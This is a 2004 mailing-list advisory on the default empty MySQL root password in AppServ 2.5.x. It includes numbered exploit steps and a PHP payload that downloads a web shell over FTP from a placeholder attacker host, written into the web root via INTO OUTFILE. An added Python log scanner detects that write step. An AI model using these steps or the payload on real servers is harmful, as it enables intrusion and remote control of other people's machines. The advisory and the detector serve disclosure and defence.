

AppServ 2.5.x and Prior Exploit


Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@yahoo.com.>
To: bugtraq@securityfocus.com
Subject: AppServ 2.5.x and Prior Exploit



What is AppServ
===============
AppServ is an Apache/PHP/MySQL open source software installer package.

Objective:
- Easy to build Webserver and Database Server
- For those who are just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that are easily ported to other platforms such as WindowZ
- Single-step installation; no need to perform multi-step, time-consuming installation and configuration.
- Ready-to-run just after you've finished installing.
- If you hate and are bored with M$ IIS Webserver.

AppServ URL: http://www.appservnetwork.com
Vulnerability Ver: 2.5.X and prior

Problem:
The program comes with a default user (Root) and an empty password, which lets an attacker control the program and the computer.

Exploit Method
1) Scan tool (SuperScan or whatever): this step is to scan for the MySQL service on port 3306.
2) When we find a service (MySQL on 3306) we can request the IP from IE (Internet Explorer). From IE we can request the machine IP like (http://xxx.xxx.xxx.xxx)
3) If we succeed, the index page for AppServ opens.
4) Now we can edit the databases and tables in MySQL by phpMyAdmin from IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)
5) The default MySQL Server comes with two databases (test, mysql); our target is (mysql). Now we can add a new table containing our exploit:
- Create a new table, for example (exploit), with one field of type TEXT
- Insert into the database the exploit (PHP code) like:
==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>
==============end=====================
The attacker could use "Windows FTP Server" or any FTP daemon, it doesn't matter :-)
phpshell.php is a script with functions like (system, passthru, exec ...etc); you can find a nice phpshell here (http://phpfm.sf.net). The attacker could download an EXE file instead.
6) Now we are able to make a query to an outfile by using the INTO OUTFILE statement:
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'
7) Query.php contains our PHP code.
8) If we succeed we can request (http://xxx.xxx.xxx.xxx/Query.php)
9) If the FTP connection is successful and phpshell.php is downloaded to the victim PC, you can send a new request like: (http://xxx.xxx.xxx.xxx/phpshell.php)
10) Game's Over

Fix
=====
1) Change the Root password
2) Use a firewall for Apache and MySQL Server
3) Use Safe Mode for your scripts

discovered by Saudi Linux
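
Added example (not part of the original post): a defender-side check that scans MySQL query log lines for INTO OUTFILE / INTO DUMPFILE statements writing a script file under the AppServ web root, which is the step the advisory relies on. The web root comes from the post; the log lines are constructed samples in the style of a MySQL general query log, and the extension list and function names are assumptions of this example.

```python
import ntpath
import re
from pathlib import PureWindowsPath

# Assumptions of this example: the document root named in the post, and the
# extensions a default Apache/PHP install would execute as PHP.
WEB_ROOT = PureWindowsPath(r"C:\AppServ\www")
SCRIPT_EXTS = {".php", ".php3", ".phtml"}

# INTO OUTFILE / INTO DUMPFILE followed by a quoted SQL string literal.
OUTFILE_RE = re.compile(
    r"\bINTO\s+(?:OUT|DUMP)FILE\s+(['\"])((?:\\.|(?!\1).)*)\1", re.IGNORECASE)

def sql_unescape(literal):
    """Drop SQL backslash escaping (\\\\ -> \\); sufficient for path matching."""
    return re.sub(r"\\(.)", r"\1", literal)

def find_webroot_writes(log_lines):
    """Return (line_no, target) for each query that writes a script under WEB_ROOT."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        for m in OUTFILE_RE.finditer(line):
            # normpath collapses "..", unifies slashes; PureWindowsPath
            # comparisons are case-insensitive, as on the Windows host.
            target = PureWindowsPath(ntpath.normpath(sql_unescape(m.group(2))))
            if WEB_ROOT in target.parents and target.suffix.lower() in SCRIPT_EXTS:
                hits.append((no, str(target)))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    r"041118 16:02:11  7 Connect  root@localhost on mysql",
    r"041118 16:02:15  7 Query    SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'",
    r"041118 16:03:40  8 Query    SELECT * FROM orders INTO OUTFILE 'D:\\backup\\orders.csv'",
    r"041118 16:04:02  9 Query    select 1 into dumpfile 'c:/appserv/WWW/img/../a.PHP'",
    r"041118 16:05:00  9 Query    SELECT * FROM t INTO OUTFILE 'C:\\AppServ\\www\\report.csv'",
]

if __name__ == "__main__":
    for line_no, path in find_webroot_writes(SAMPLE_LOG):
        print(f"line {line_no}: script written into web root: {path}")
```

Lines 2 and 4 of the sample are flagged; the CSV exports and the write outside the web root are not.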



